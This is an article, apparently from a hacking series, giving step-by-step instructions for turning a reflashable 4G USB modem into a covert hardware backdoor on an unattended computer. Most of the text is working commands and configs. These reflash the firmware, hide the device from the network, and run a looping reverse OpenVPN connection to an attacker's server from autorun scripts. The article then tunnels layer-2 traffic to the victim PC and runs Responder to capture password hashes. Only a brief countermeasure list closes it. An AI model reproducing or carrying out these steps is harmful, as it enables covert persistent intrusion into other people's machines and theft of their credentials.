What if someone connects a special device to a computer left unattended, thus, gaining remote access to it from anywhere in the world? All the USB-based device emulation magic described earlier will be at the attacker’s disposal. But this time, the primary purpose of your malicious device is uninterrupted remote access, not attacks.
info
This article continues the series of publications describing practical hacking and attacking techniques involving makeshift devices that can be easily assembled at home. You will learn how to gain unauthorized access to protected information and how to protect your own data from such attacks. The previous article in this series was Evil Ethernet. BadUSB-ETH attack in detail.
Modern 4G modems (HiLink) are only slightly larger than a flash drive, and they run Linux. For instance, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 for GSM. Such USB-powered devices are fully autonomous. Immediately after the connection to a PC, the modem OS is loaded (which takes a few seconds) and emulates this USB device as a network card.
The best hardware solution for the attack described in this article is a HiLink modem: it’s compact and equipped with a 4G module. For instance, the popular Huawei E3372h-153 that can be reflashed and is supported by a huge fan community.
Modern 4G modems are HiLink modems (i.e. the system identifies them as network cards). As a result, the OS running on the user’s PC conveniently interacts with the Internet via such a virtual Ethernet network. But the point is that the modem itself can be used to interact with the PC it’s plugged into. A fully functional OS runs inside this modem emulating a network card (similar to the BadUSB-ETH attack). Such a device can be used to establish a foothold on the compromised PC as shown below.
To establish a foothold in similar circumstances, you can use a ready-made device called LAN Turtle, but it lacks an important feature: support for a 4G channel that is external to the attacked system
Implementation
The device is so well suited for remote access that it requires a minimum of modifications. Its main advantages are as follows:
- no additional power is required;
- covert connection: the device won’t be visible on the local network as it operates only inside the compromised PC; and
- an autonomous 4G data transmission channel enables you to maintain access even inside isolated local networks.
For maximum efficiency, the device should be slightly modified: you have to reflash the modem. After this modification, the modem OS will automatically establish a VPN connection with the control server via the 4G network (an external channel), thus, providing stable network access to the PC the modem is plugged into. You can access the modem OS in one of the following ways:
telnet 192.168.8.1
adb connect 192.168.8.1:5555
To make further modifications, you have to enable ports for AT commands:
curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0
After enabling the debug mode, the modem OS can be modified: you have to switch to the flash mode and flash the open firmware:
at^godload # Switch to the flash mode. The modem will restartsudo ./balong_flash -p /dev/ttyUSB0 E3372h-153_Update_22.200.15.00.00_M_AT_05.10_nv.exe
When the modem starts, it usually emulates a CD-ROM with drivers and an SD card. These functions must be disabled since the device needs only network emulation:
AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Don't switch to the CD-ROM mode at startup; RNDIS/CDC is enabledAT^RESET # RestartNext, you have to modify the DHCP server so that the modem doesn’t announce itself as a gateway, and the routing table on the PC isn’t disrupted. The modem should connect as covertly as possible:
cat <<EE > /data/configInterface br0MinLease 30Vendorid c0012Address mainEnbSrv 1Start 192.168.8.100End 192.168.8.200Option lease 86400Option subnet 255.255.255.0Address main endEENow you have to copy the OpenVPN client with the driver and config to the modem. To avoid compilation, ready-made binaries can be downloaded from the 4PDA website:
adb push tun.ko /online/ovpn/adb push openvpn /online/ovpn/adb push vds.ovpn /online/ovpn/cat <<EE > /data/vpn.sh#!/system/bin/busybox shwhile :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn --route-noexec; doneEEchmod 700 /data/vpn.shbusybox passwdrebootTo make the reverse connection more reliable, VPN should be run in an infinite loop. Finally, you have to configure autorun for all this stuff and organize the routing of packets from the 4G network towards the target computer through the modem:
mount -o remount,rw /dev/block/mtdblock16cat <<EE >> /system/etc/autorun.sh/data/autorun.sh &EEcat <<EE > /data/autorun.sh#!/system/bin/busybox shkillall dhcps.realcp /data/config /var/dhcp/dhcps/configdhcps.real &sleep 5insmod /online/ovpn/tun.ko/data/vpn.sh &iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADEiptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROPiptables -I FORWARD 2 -i br0 -o wan0 -j DROPEEchmod 700 /data/autorun.shImportant: access to the 4G Internet from the target PC must be prohibited on the modem, and the web admin panel must be hidden. Now the modified modem can be used as a hardware backdoor.
Establishing a foothold
Your hardware backdoor can look something like this.
Looks pretty innocent, doesn’t it? Just a memory stick, an ordinary user will think. If the attacker can access a USB port on the target PC, chances are high that no one notices such a ‘strange’ device for a while. This grants the attacker long-term network access to the target via an autonomous channel. Note that remote connection is implemented via an external channel, and you no longer need the internal network to access the Internet. Your mobile network channel grants you guaranteed remote access.
The smartphone and LAN Turtle are connected to the same VPN server that connects their network traffic. The 4G modem is reconfigured to pass traffic in an unusual reverse direction: through itself towards the computer (like a gateway). As a result, the attacker maintains direct network access to the compromised PC even at a distance of thousands of kilometers.
In this example, the phone and the laptop aren’t connected directly and operate in different networks. The laptop is connected to the local network via a cable without using the Internet, while the phone is connected over 4G. But when you add a route to the victim’s computer via a 4G modem, you gain remote access to this PC.
L2 access
This foothold creation technique provides network access only to the PC the modem is connected to. Further actions of the attacker require logical access (i.e. hacking the system and controlling it). In the case of success, this grants you both control over the attacked PC and the ability to advance deeper into the local network. To facilitate attacks on the target system, you may have to establish an L2VPN tunnel closer to the target.
Another VPN tunnel should be forwarded inside the existing one. The first VPN was used exclusively for communication with the lan_turtle device; while the second one will grant you the maximum possible network access to the target PC via the USB-emulated network.
To achieve this, you have to execute a few more commands inside the USB modem to create a VPN tunnel and place the newly-created virtual interface inside a network bridge with the USB interface:
./openvpn --config l2.ovpn --route-noexecbrctl addif br0 tap1ifconfig tap1 0The configuration file can be created directly inside the modem; its content should be as follows:
l2.ovpn
lclient
proto tcp
dev tap
remote 172.16.0.10 1194
<ca>
</ca>
<cert>
</cert>
<key>
</key>
keepalive 10 60
persist-key
persist-tun
The L2 VPN interface will have an IP address that’s not really needed since OpenVPN is already running. But you can discard it and then just place the interface inside the bridge. As a result, L2 packets from the compromised PC will go to the VPN interface. Not only will you get logical network access to the target PC, but you’ll see it as if you’ve plugged an Internet cable into it.
On the attacker’s side, all you need to do is connect to the modem, create a VPN tunnel, and then manually set its IP address from the network adapter subnet of the victim’s PC:
sudo openvpn --config lan_turtle.ovpn --route-noexecsudo ifconfig tap0 192.168.8.200/24
The configuration file used to connect to lan_turtle and forward an L2VPN tunnel is as follows:
lan_turtle.ovpn
local 172.16.0.10port 1194proto tcpdev tapuser nobody<ca></ca><cert></cert><key></key><dh></dh>server 192.168.9.0 255.255.255.0keepalive 10 180verb 3Now the attacker gains full network access to the victim’s computer via a 4G modem. The L2 tunnel enables you to deliver attacks targeting link-layer protocols, as well as NetBIOS, using Responder and retrieve the user’s password hash:
responder -I tap0 -r -d -w -FProtection
Since the attacker penetrates into the target PC through a USB port, the countermeasures are the same as in the case of BadUSB:
- use specialized software solutions to block untrusted USB devices;
- disable support for USB network cards in group policies;
- inspect computers on a regular basis; and
- control physical access to the PC.
Good luck!